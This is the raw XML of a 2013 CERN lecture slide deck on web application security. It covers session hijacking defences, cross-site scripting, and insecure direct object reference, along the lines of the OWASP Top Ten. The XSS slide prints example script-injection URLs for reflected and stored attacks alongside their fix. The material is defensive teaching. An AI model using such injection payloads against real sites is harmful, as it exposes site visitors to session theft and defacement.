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8"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId29"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="258" r:id="rId2"/>
    <p:sldId id="402" r:id="rId3"/>
    <p:sldId id="403" r:id="rId4"/>
    <p:sldId id="404" r:id="rId5"/>
    <p:sldId id="405" r:id="rId6"/>
    <p:sldId id="406" r:id="rId7"/>
    <p:sldId id="407" r:id="rId8"/>
    <p:sldId id="410" r:id="rId9"/>
    <p:sldId id="411" r:id="rId10"/>
    <p:sldId id="427" r:id="rId11"/>
    <p:sldId id="408" r:id="rId12"/>
    <p:sldId id="412" r:id="rId13"/>
    <p:sldId id="415" r:id="rId14"/>
    <p:sldId id="413" r:id="rId15"/>
    <p:sldId id="416" r:id="rId16"/>
    <p:sldId id="417" r:id="rId17"/>
    <p:sldId id="418" r:id="rId18"/>
    <p:sldId id="419" r:id="rId19"/>
    <p:sldId id="422" r:id="rId20"/>
    <p:sldId id="423" r:id="rId21"/>
    <p:sldId id="424" r:id="rId22"/>
    <p:sldId id="425" r:id="rId23"/>
    <p:sldId id="426" r:id="rId24"/>
    <p:sldId id="420" r:id="rId25"/>
    <p:sldId id="421" r:id="rId26"/>
    <p:sldId id="428" r:id="rId27"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="9601200" cy="73152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3300"/>
    <a:srgbClr val="17175E"/>
    <a:srgbClr val="33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82746" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="-120" y="-11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88" d="100"/>
        <a:sy n="188" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-1712" y="-92"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2304"/>
        <p:guide pos="3024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notesMaster" Target="notesMasters/notesMaster1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printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps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theme" Target="theme/theme1.xml"/><Relationship Id="rId34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160838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defTabSz="966788"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438775" y="0"/>
            <a:ext cx="4160838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 defTabSz="966788"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6948488"/>
            <a:ext cx="4160838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defTabSz="966788"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438775" y="6948488"/>
            <a:ext cx="4160838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 defTabSz="966788">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3B4BD539-9F38-4333-A60A-8A08129D56E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03299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160838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438775" y="0"/>
            <a:ext cx="4160838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62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971800" y="549275"/>
            <a:ext cx="3657600" cy="27432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1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60438" y="3475038"/>
            <a:ext cx="7680325" cy="349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6948488"/>
            <a:ext cx="4160838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438775" y="6948488"/>
            <a:ext cx="4160838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FFBD308C-721A-48E0-AB1E-69343C9A7F7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658106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2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30B872AF-A4DA-4C4B-8E08-625E59654E48}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972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109913" y="701675"/>
            <a:ext cx="3379787" cy="2535238"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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250969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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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15701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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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928784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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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178735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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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052490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2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C07789E-84FF-459F-BED9-B24ED7B29154}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1792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" name="Notes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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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90984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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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060061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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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664162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523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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9523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C49082C1-988C-401B-9390-1EE794A34AFB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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641504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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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598516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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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618683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601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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8602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88A3CA2-B098-4802-9280-6DB203967C1A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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090375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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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98048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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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683775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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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898770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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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00624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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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083583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20D05CF-4D6B-4FED-A74C-4A2807AFFEDB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94918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>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="6443663"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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10800000" wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="836613"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 11" descr="CSC_logo_2-3_small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018" r="11018"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7812088" y="146050"/>
            <a:ext cx="1138237" cy="661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41742436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85129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9100" y="188913"/>
            <a:ext cx="2195513" cy="61198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79388" y="188913"/>
            <a:ext cx="6437312" cy="61198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36418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13340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219383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0825" y="1125538"/>
            <a:ext cx="4279900" cy="51831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3125" y="1125538"/>
            <a:ext cx="4281488" cy="51831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92619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79582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60569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580425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039711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1955938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3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="6443663"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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10800000" wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="836613"/>
            <a:ext cx="9144000" cy="36512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="17175E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3333CC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945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/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50825" y="1125538"/>
            <a:ext cx="8713788" cy="5183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9" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="350838" y="6489700"/>
            <a:ext cx="27940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fld id="{393141B5-ABE2-4D8D-AE79-294D4AD5F5FA}" type="slidenum">
              <a:rPr lang="en-GB" b="1"/>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1530350" y="6540500"/>
            <a:ext cx="2012950" cy="198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GB" sz="1300" b="1"/>
              <a:t>Creating Secure Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4787900" y="6540500"/>
            <a:ext cx="4297363" cy="20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pl-PL" sz="1300" b="1"/>
              <a:t>Sebastian Lopienski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1300" b="1"/>
              <a:t> CERN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1"/>
              <a:t>Computer Security Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103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79388" y="188913"/>
            <a:ext cx="7993062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pic>
        <p:nvPicPr>
          <p:cNvPr id="1033" name="Picture 15" descr="CSC_logo_2-3_small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018" r="11018"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8113713" y="228600"/>
            <a:ext cx="922337" cy="53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19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</p:sldLayoutIdLs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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="266700" indent="-2667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2600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="711200" indent="-265113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Font typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2300">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1079500" indent="-188913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3pPr>
      <a:lvl4pPr marL="1435100" indent="-176213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1790700" indent="-176213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247900" indent="-176213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705100" indent="-176213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162300" indent="-176213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619500" indent="-176213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12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5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://phpsec.org/projects/guide/" TargetMode="External"/><Relationship Id="rId4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4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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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jpe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0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2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20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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId7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om/help/operators.html" TargetMode="External"/><Relationship Id="rId4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owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId4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611188" y="1916113"/>
            <a:ext cx="8053387" cy="4608512"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" smtClean="0">
                <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Web application security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4300" dirty="0" smtClean="0">
              <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sebastian Lopienski</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="60000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CERN Deputy Computer Security Officer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Openlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/summer student lectures 2013</a:t>
            </a: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A2: Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>authn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &amp; session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mgmt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8601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Understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session hijacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>techniques, e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>session fixation (attacker sets victim’s session id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>stealing session id: eavesdropping (if not https), XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trust the solution offered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>by the platform / language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and follow its recommendations (for code, configuration etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Additionally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>generate new session ID on login (do not reuse old ones)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use cookies for storing session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set session timeout and provide logout possibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>consider enabling “same IP” policy (not always possible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>check referer (previous URL), user agent (browser version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>require https (at least for the login / password transfer)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25498129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1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1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1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1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1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6019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A3: Cross-site scripting (XSS)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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(XSS) vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an application takes user input and sends it </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to a Web browser without validation or encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker can execute JavaScript code in the victim's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to hijack user sessions, deface web sites etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>– value returned immediately to the browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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http://site.com/search?q=</a:t>
            </a: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abc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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http://site.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert("XSS");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>– value stored and reused (all visitors affected)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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http://site.com/add_comment?txt=</a:t>
            </a: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Great!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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http://site.com/add_comment?txt=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTML output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New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336667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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4: Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8294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Attacker manipulates the URL or form values </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthorized access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to objects (data in a database, objects in memory etc.):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
